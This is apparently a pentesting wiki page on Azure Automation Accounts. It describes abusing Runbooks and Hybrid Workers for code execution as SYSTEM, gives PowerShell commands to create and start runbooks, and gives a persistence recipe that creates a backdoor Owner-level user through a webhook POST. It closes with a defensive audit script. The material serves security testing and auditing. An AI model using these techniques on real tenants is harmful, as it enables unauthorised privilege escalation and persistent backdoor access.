
# Az - Automation Account

## Basic Information

Azure Automation delivers a cloud-based automation, operating system updates, and configuration service that supports consistent management across your Azure and non-Azure environments. It includes process automation, configuration management, update management, shared capabilities, and heterogeneous features.

These are like "scheduled tasks" in Azure that let you execute things (actions or even scripts) to manage, check and configure the Azure environment.

### Run As Account

When a Run As account is used, it creates an Azure AD application with a self-signed certificate, creates a service principal and assigns the Contributor role for the account in the current subscription (a lot of privileges).
Microsoft recommends using a Managed Identity for the Automation Account instead.

{% hint style="warning" %} This will be removed on September 30, 2023 and changed for Managed Identities. {% endhint %}

### Compromise Runbooks & Jobs

Runbooks allow you to execute arbitrary PowerShell code. This could be abused by an attacker to steal the permissions of the attached principal (if any).
In the code of Runbooks you could also find sensitive info (such as creds).

If you can read the jobs, do it as they contain the output of the run (potential sensitive info).

### Hybrid Worker

A Runbook can be run in a container inside Azure or in a Hybrid Worker.
The Log Analytics Agent is deployed on the VM to register it as a Hybrid Worker.
Hybrid Worker jobs run as SYSTEM on Windows and as the nxautomation account on Linux.
Each Hybrid Worker is registered in a Hybrid Worker Group.

Therefore, if you can choose to run a Runbook on a Windows Hybrid Worker, you will execute arbitrary commands inside that machine as SYSTEM.

### Compromise State Configuration (SC)

Azure Automation State Configuration is an Azure configuration management service that allows you to write, manage, and compile PowerShell Desired State Configuration (DSC) configurations for nodes in any cloud or on-premises datacenter. The service also imports DSC Resources, and assigns configurations to target nodes, all in the cloud. You can access Azure Automation State Configuration in the Azure portal by selecting State configuration (DSC) under Configuration Management.

#### RCE

It's possible to abuse SC to run arbitrary scripts in the managed machines.

{% content-ref url="az-state-configuration-rce.md" %} az-state-configuration-rce.md {% endcontent-ref %}

## Enumeration

```bash
# Check user rights for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything, the user is not part of an Automation group
```

### Create a Runbook

```powershell
# Get the role of a user on the Automation account
# Contributor or higher = can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>

# List hybrid worker groups
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>

# Create a PowerShell Runbook
Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose

# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
```

## Persistence

### Automation that creates a highly privileged user

* Create a new Automation Account
  * "Create Azure Run As account": Yes
* Import a new runbook that creates an AzureAD user with Owner permissions for the subscription
* Add the AzureAD module to the Automation account
  * Update the Azure Automation Modules
* Assign "User Administrator" and "Subscription Owner" rights to the automation account
* Eventually lose your access…
* Trigger the webhook with a POST request to create the new user

```powershell
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
$AccountInfo  = @(@{RequestBody=@{Username="BackdoorUsername";Password="BackdoorPassword"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
```
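The Enumeration and Persistence sections above describe the things to look for in an Automation account: who holds Contributor or higher on it, which Hybrid Worker groups exist, which webhooks can start runbooks, and what recent jobs ran. The following audit script, written as an added example (not HackTricks code), walks every Automation account the caller can see and reports exactly those items. It assumes the Az.Accounts and Az.Automation modules are installed, that Connect-AzAccount has already been run, and that the object property names match current Az.Automation output.

```powershell
# Added audit example (not from the original page). Assumptions: Az.Accounts and
# Az.Automation are installed, Connect-AzAccount has been run (Reader is enough),
# and property names (RunbookWorker, IsEnabled, HybridWorker, ...) follow current
# Az.Automation output.
$subId = (Get-AzContext).Subscription.Id
# Built-in roles that allow authoring and starting runbooks on the account
$privilegedRoles = @('Owner', 'Contributor', 'Automation Contributor')

foreach ($acct in Get-AzAutomationAccount) {
    $rg    = $acct.ResourceGroupName
    $name  = $acct.AutomationAccountName
    $scope = "/subscriptions/$subId/resourceGroups/$rg/providers/Microsoft.Automation/automationAccounts/$name"
    Write-Host "`n=== Automation account: $name (RG: $rg) ==="

    # 1. Principals who can create/publish/start runbooks (assigned at the account or inherited)
    Write-Host "-- Contributor-or-higher assignments --"
    Get-AzRoleAssignment -Scope $scope |
        Where-Object { $privilegedRoles -contains $_.RoleDefinitionName } |
        Select-Object DisplayName, ObjectType, RoleDefinitionName, Scope |
        Format-Table -AutoSize | Out-String | Write-Host

    # 2. Hybrid Worker groups: a runbook started with -RunOn <group> runs on those hosts
    #    as SYSTEM (Windows) or nxautomation (Linux)
    Get-AzAutomationHybridWorkerGroup -ResourceGroupName $rg -AutomationAccountName $name |
        ForEach-Object { Write-Host "[hybrid]  group '$($_.Name)' workers=$($_.RunbookWorker.Count)" }

    # 3. Enabled webhooks: whoever holds the URL can start the linked runbook without signing in
    Get-AzAutomationWebhook -ResourceGroupName $rg -AutomationAccountName $name |
        Where-Object { $_.IsEnabled } |
        ForEach-Object {
            Write-Host "[webhook] '$($_.Name)' -> runbook '$($_.RunbookName)' expires=$($_.ExpiryTime) lastInvoked=$($_.LastInvokedTime)"
        }

    # 4. Runbooks present and jobs from the last 7 days; job output may contain secrets,
    #    so anyone able to read jobs on this account should appear in step 1 or be reviewed
    Get-AzAutomationRunbook -ResourceGroupName $rg -AutomationAccountName $name |
        ForEach-Object { Write-Host "[runbook] '$($_.Name)' type=$($_.RunbookType) state=$($_.State) modified=$($_.LastModifiedTime)" }
    Get-AzAutomationJob -ResourceGroupName $rg -AutomationAccountName $name -StartTime (Get-Date).AddDays(-7) |
        ForEach-Object { Write-Host "[job]     $($_.RunbookName) status=$($_.Status) started=$($_.StartTime) worker=$($_.HybridWorker)" }
}
```

Any enabled webhook, any Hybrid Worker group, and any Contributor-or-higher assignment to a principal that does not need to author runbooks is a finding worth tracking; Run As accounts should be replaced with a Managed Identity as the page notes.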
